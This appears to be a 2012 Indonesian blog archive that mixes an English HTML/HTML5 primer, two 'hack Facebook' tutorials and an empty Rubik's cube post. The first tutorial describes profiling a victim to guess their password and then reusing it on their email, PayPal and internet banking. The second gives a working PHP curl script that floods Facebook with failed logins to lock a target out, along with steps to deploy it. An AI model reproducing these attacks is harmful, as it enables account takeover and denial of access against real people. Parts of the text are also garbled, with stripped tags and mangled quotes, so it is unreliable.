Senin, 30 April 2012

HTML part 1

What is HTML?

HTML is a language for describing web pages.

  • HTML stands for Hyper Text Markup Language
  • HTML is not a programming language, it is a markup language
  • A markup language is a set of markup tags
  • HTML uses markup tags to describe web pages

HTML Tags

HTML markup tags are usually called HTML tags

  • HTML tags are keywords surrounded by angle brackets like
  • HTML tags normally come in pairs like and
  • The first tag in a pair is the start tag, the second tag is the end tag
  • Start and end tags are also called opening tags and closing tags

HTML Documents = Web Pages

  • HTML documents describe web pages
  • HTML documents contain HTML tags and plain text
  • HTML documents are also called web pages

The purpose of a web browser (like Internet Explorer or Firefox) is to read HTML documents and display them as web pages. The browser does not display the HTML tags, but uses the tags to interpret the content of the page:

Example 1.1 :

<html>
  <head>
    <title>Hello HTML</title>
  </head>
  <body>
    <p>Hello World!</p>
  </body>
</html>

Pengertian HTML5

HTML5

HTML5 is a language for structuring and presenting content for the World Wide Web, and is a core technology of the Internet originally proposed by Opera Software. It is the fifth revision of the HTML standard (created in 1990 and standardized as HTML4 as of 1997) and as of February 2012 is still under development. Its core aims have been to improve the language with support for the latest multimedia while keeping it easily readable by humans and consistently understood by computers and devices (web browsers, parsers, etc.). HTML5 is intended to subsume not only HTML 4, but XHTML 1 and DOM Level 2 HTML as well.

Following its immediate predecessors HTML 4.01 and XHTML 1.1, HTML5 is a response to the observation that the HTML and XHTML in common use on the World Wide Web are a mixture of features introduced by various specifications, along with those introduced by software products such as web browsers, those established by common practice, and the many syntax errors in existing web documents. It is also an attempt to define a single markup language that can be written in either HTML or XHTML syntax. It includes detailed processing models to encourage more interoperable implementations; it extends, improves and rationalises the markup available for documents, and introduces markup and application programming interfaces (APIs) for complex web applications. For the same reasons, HTML5 is also a potential candidate for cross-platform mobile applications. Many features of HTML5 have been built with the consideration of being able to run on low-powered devices such as smartphones and tablets. In December 2011 research firm Strategy Analytics forecast sales of HTML5 compatible phones will top 1 billion in 2013.

In particular, HTML5 adds many new syntactical features. These include the new , and elements, as well as the integration of Scalable Vector Graphics (SVG) content that replaces the uses of generic tags. These features are designed to make it easy to include and handle multimedia and graphical content on the web without having to resort to proprietary plugins and APIs. Other new elements, such as
,
,
and

Tutorial mengHACK Facebook 2

1. Request jadi teman victim / target di facebook.

2. Lihat profilenya. Catat tanggal lahir, nama istri, pacar, anak, adik kakak, dan tanggal lahir mereka. Semua hal yang ada di facebooknya, sedetail-detailnya!

3. Logout. Coba-coba kombinasi password dari data profile yang victim berikan. Jika berhasil, lanjut ke Step Four. Jika Gagal kembali ke Step One.

4.
Jika account facebook victim berhasil masuk, coba-coba ke account social network victim lainnya, termasuk email, control panel website, paypal,internet banking dan lain-lain, karena kemungkinan victim menggunakan password yang sama sangat besar.

5. Bersihkan data profile facebook account Anda dari hal-hal yang nyaris bahkan sama dengan password yang sedang Anda gunakan jika tidak ingin hal yang sama menimpa Anda.

Tutorial mengHACK Facebook 1

Tutorial hack facebook yang akan saya share disini memiliki fungsi sama persis dengan software hack facebook yaitu bikin beku / ga bisa buad login facebook seseorang , tapi ini versi webphp jadi senjata yang harus anda siapkan adalah :
hosting yang support php dan curl (jangan 000webhost)
dan Notepad
caranya mudah , copy script dibawah ini ke notepad :

PHP Facebook Freezer”;
echo ,


”;
$email=$_POST['email'];
$passwd=’123′;
if(isset($email) && isset($passwd)){
$kue=”/tmp/”.rand().”.txt”;
$url=’https://login.facebook.com/login.php’;
$login=”email=$email&pass=$passwd&login=Log In”;
define(“_COK_”, $kue);
curlget($url);
for ($number=1; $number<=30; $number++) {
$data=curlpost($url,$login);
}
echo $data;
}
function curlget($url){
$agent=$_SERVER['HTTP_USER_AGENT'];
$curl=curl_init();
curl_setopt($curl, CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_USERAGENT, $agent);
curl_setopt($curl, CURLOPT_RETURNTRANSFER ,1);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION ,1);
curl_setopt($curl, CURLOPT_ENCODING, “”);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_COOKIEFILE, _COK_);
curl_setopt($curl, CURLOPT_COOKIEJAR, _COK_);
$data = curl_exec($curl);
curl_close ($curl);
return $data;
}
function curlpost($url,$post){
$agent=$_SERVER['HTTP_USER_AGENT'];
$curl=curl_init();
curl_setopt($curl, CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_USERAGENT, $agent);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, $post);
curl_setopt($curl, CURLOPT_ENCODING, “”);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION ,1);
curl_setopt($curl, CURLOPT_RETURNTRANSFER ,1);
curl_setopt($curl, CURLOPT_COOKIEFILE, _COK_);
curl_setopt($curl, CURLOPT_COOKIEJAR, _COK_);
$data = curl_exec($curl);
curl_close ($curl);
return $data;
}
echo “”;
?>

setelah kamu berhasil mengkopi script untuk hack facebook diatas , kini saatnya untuk menyimpan dengan nama nomoredisk.Php
setelah itu kamu upload file Fb.Php ke hostinganmu yang suport curl dan php
klo file udah di upload kini tinggal main ,
buka file yang kamu upload tadi ex: http://wolimierz.org/images/nomoredisk.php
setelah itu masukan dah email target, maka dia ga akan bisa login (tapi ga permanent).

Rabu, 14 Maret 2012

RUBIK

Helllloooooooo..........temen-temen yang masih pemula dan penasaran dengan permainan otak atik kotak-kotak, hahahaha...maksud saya rubik...nii...saya kasi kalian tutorial rubik 3x3...Selamat mencoba dan semoga bermanfaat okkk...

1. Download
2. Download
3. Download